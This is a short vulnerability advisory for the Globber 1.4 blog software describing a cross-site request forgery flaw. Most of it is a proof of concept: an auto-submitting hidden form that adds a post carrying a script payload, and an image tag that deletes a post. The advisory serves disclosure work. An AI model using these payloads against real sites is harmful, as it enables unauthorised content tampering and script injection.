Software Vulnerability Tested On Date
Globber 1.4 Cross-site Request Forgery Windows Vista + XAMPP 7/6/2010
A cross-site request forgery vulnerability in Globber can be exploited to add and delete blog posts.
Proof of Concept
<!-- Add (note that blog also must be "rebuilt") -->
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
            <input type="hidden" name="title" value="New Article" />
            <input type="hidden" name="date" value="06-07-2010 10:16 pm" />
            <input type="hidden" name="tags" value="" />
            <input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />

<!-- Delete -->
        <img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />